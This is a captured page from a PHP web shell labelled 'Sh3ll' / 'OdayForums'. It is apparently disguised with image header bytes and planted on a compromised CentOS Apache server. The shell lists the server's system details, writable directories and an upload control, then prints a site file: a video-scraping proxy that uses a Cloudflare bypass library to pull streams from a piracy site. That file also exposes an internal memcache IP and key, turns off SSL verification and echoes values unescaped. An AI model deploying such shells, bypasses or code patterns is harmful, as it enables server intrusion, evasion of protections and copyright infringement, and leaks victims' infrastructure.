ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/vidoe.top/proxy/stream3/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/vidoe.top/proxy/stream3/examples/test3-2.php
<?php
session_start();
function curl($url,$ref) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    $head[] = ":authority: play.kissasian.es";
    $head[] = "accept: application/json, text/javascript, */*; q=0.01";
    $head[] = "accept-encoding: gzip, deflate, br";
    $head[] = "accept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5";
    $head[] = "origin: https://kissasian.es";
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36');
    curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
    curl_setopt($ch, CURLOPT_REFERER, $ref);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
    $page = curl_exec($ch);
    curl_close($ch);
    return $page;
}
function str_encode($data,$pwd)
{
    $x = 0;
    $a = 0;
    $j = 0;
    $Zcrypt = '';
    $pwd_length = strlen($pwd);
    for ($i = 0; $i < 255; $i++) {
        $key[$i] = ord(substr($pwd, ($i % $pwd_length)+1, 1));
        $counter[$i] = $i;
    }
    for ($i = 0; $i < 255; $i++) {
        $x = ($x + $counter[$i] + $key[$i]) % 256;
        $temp_swap = $counter[$i];
        $counter[$i] = $counter[$x];
        $counter[$x] = $temp_swap;
    }
    for ($i = 0; $i < strlen($data); $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $counter[$a]) % 256;
        $temp = $counter[$a];
        $counter[$a] = $counter[$j];
        $counter[$j] = $temp;
        $k = $counter[(($counter[$a] + $counter[$j]) % 256)];
        $Zcipher = ord(substr($data, $i, 1)) ^ $k;
        $Zcrypt .= chr($Zcipher);
    }
    return $Zcrypt;
}

require __DIR__ . '/../src/autoload.php';

use CloudflareBypass\RequestMethod\CFStream;

$stream_cf_wrapper = new CFStream(array(
    'max_retries'   => 5,                       // How many times to try and get clearance?
    'cache'         => true,                   // Enable caching?
    'cache_path'    => __DIR__ . '/cache',      // Where to cache cookies? (Default: system tmp directory)
    'verbose'       => false,
    'verbose_mode'       => false
));

// Get Example: 1
$opts = array(
    'http' => array(
        'method' => "GET",
        'header' => array(
            'accept: */*',       // required
            'host: kissasian.es',    // required
            'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'
        )
    )
);

$memcache = new Memcache;
$memcache->connect('46.249.32.55', 11211) or die ("Sorry, could not connect memcached! . We're working on getting this fixed as soon as we can.");


$url_encode = $_GET['url'];
$url_decode =  str_encode(hex2bin($url_encode),'123Vid@Net');
$arr_url = explode('?id=',$url_decode);
$id = $arr_url[1];

$key_url = md5($url_decode.'v=9');
$cache_show_source = $memcache->get($key_url);

$type='';
if(isset($_GET['type'])){
    $type=$_GET['type'];
}
if($cache_show_source){
    $arr_res = $cache_show_source;
}else {
    $url = "https://kissasian.es/ajax/anime/load_episodes_v2?s=oserver&episode_id=" . $id;

    $ctx = $stream_cf_wrapper->contextCreate($url, stream_context_create($opts));

    $c1 = file_get_contents($url, false, $ctx);
    $arr1 = json_decode($c1);
    $url2 = $arr1->value;

    $ref = $url_decode;
    $c2 = curl($url2, $ref);
    $arr2 = json_decode($c2, true);

        $arr_res['file'] = $arr2['playlist'][0]['file'];
        $arr_res['type']='application/x-mpegURL';
        $cache_time=3600;

    if(!empty($arr_res['file'])) {
        $memcache->set($key_url, $arr_res, MEMCACHE_COMPRESSED, $cache_time);
    }

}


?>
<html style="width: 100%; height: 100%"><head>
    <title>-Server 2 embed-</title>
    <base href="https://www.123vid.net/proxy/stream3/examples/">
    <style type="text/css">
        body {
            background: #000000;
            margin: 0px;
            padding: 0px;
        }
    </style>
    <link href="js/video-js.css" rel="stylesheet" type="text/css" />
    <script src="js/video.js"></script>
    <script src="js/videojs-contrib-hls.js"></script>


</head>

<body style="width: 100%; height: 100%" oncontextmenu="return false;">
<?php
if($arr_res['file']!='') {
    if ($arr_res['type'] == 'video/mp4') {
        ?>

        <video autoplay controls id="ht_player" style="width: 100%; height: 100%" class="video-js vjs-default-skin"
               preload="auto" poster="https://www.123vid.net/skin/phim98/assets/img/123vid.jpg" data-setup="{ }">
            <source src="<?php echo $arr_res['file']; ?>" type='<?php echo $arr_res['type']; ?>'/>
            <p>Video Playback Not Supported</p>
        </video>
        <script type="text/javascript">
            var player = videojs('#ht_player');
            player.play();
        </script>
    <?php
    }else{

    preg_match('#,(.*?),\.urlset#is', $arr_res['file'], $match);
    $parse = parse_url($arr_res['file']);

    $file = 'https://' . $parse['host'] . '/hls/' . $match[1] . '/index-v1-a1.m3u8';

    ?>
        <video autoplay controls id="ht_player" style="width: 100%; height: 100%" class="video-js vjs-default-skin"
               preload="auto" poster="https://www.123vid.net/skin/phim98/assets/img/123vid.jpg" data-setup="{ }">
            <source src="https://www.123vid.net/proxy/stream3/examples/test4.php?url=<?php echo base64_encode($file); ?>" type="<?php echo $arr_res['type']; ?>"/>
            <p>Video Playback Not Supported</p>
        </video>
        <script type="text/javascript">
            var player = videojs('#ht_player');
            player.play();
        </script>
        <?php
    }
}else{
    $_SESSION['reload2_'.$id] = $_SESSION['reload2_'.$id]+1;
    if($_SESSION['reload2_'.$id]>=8){
        echo '<h1 style="color: #fff1f0; text-align: center;">Sorry, this video error, please choose another server!</h1>';
    }else {
        echo '<script>location.reload();</script>';
    }
}
?>

</body></html>

ZeroDay Forums Mini